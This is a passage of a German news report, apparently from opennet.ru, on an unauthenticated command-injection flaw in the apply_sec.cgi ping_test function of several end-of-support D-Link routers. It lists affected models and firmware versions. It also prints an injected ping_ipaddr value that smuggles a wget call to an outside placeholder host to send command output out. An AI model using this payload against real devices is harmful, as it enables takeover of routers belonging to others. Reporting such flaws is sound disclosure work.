In D-Link-WLAN-Routern
Interessanterweise sollte der „ping_test“-Aufruf nach Angaben der Firmware-Entwickler erst nach der Authentifizierung ausgeführt werden, in Wirklichkeit wird er jedoch auf jeden Fall aufgerufen, unabhängig von der Anmeldung am Webinterface. Insbesondere beim Zugriff auf das apply_sec.cgi-Skript und der Übergabe des Parameters „action=ping_test“ leitet das Skript zur Authentifizierungsseite weiter, führt aber gleichzeitig die mit ping_test verbundene Aktion aus. Um den Code auszuführen, wurde eine weitere Schwachstelle in ping_test selbst ausgenutzt, die das Ping-Dienstprogramm aufruft, ohne die Richtigkeit der zum Testen gesendeten IP-Adresse ordnungsgemäß zu überprüfen. Um beispielsweise das Dienstprogramm wget aufzurufen und die Ergebnisse des Befehls „echo 1234“ an einen externen Host zu übertragen, geben Sie einfach den Parameter „ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://“ an. test.test/?$( echo 1234)".
Das Vorhandensein der Sicherheitslücke wurde in den folgenden Modellen offiziell bestätigt:
- DIR-655 mit Firmware 3.02b05 oder älter;
- DIR-866L mit Firmware 1.03b04 oder älter;
- DIR-1565 mit Firmware 1.01 oder älter;
- DIR-652 (es werden keine Informationen zu problematischen Firmware-Versionen bereitgestellt)
Der Supportzeitraum für diese Modelle sei bereits abgelaufen, so D-Link
Später stellte sich heraus, dass die Sicherheitslücke ebenfalls bestand
Source: opennet.ru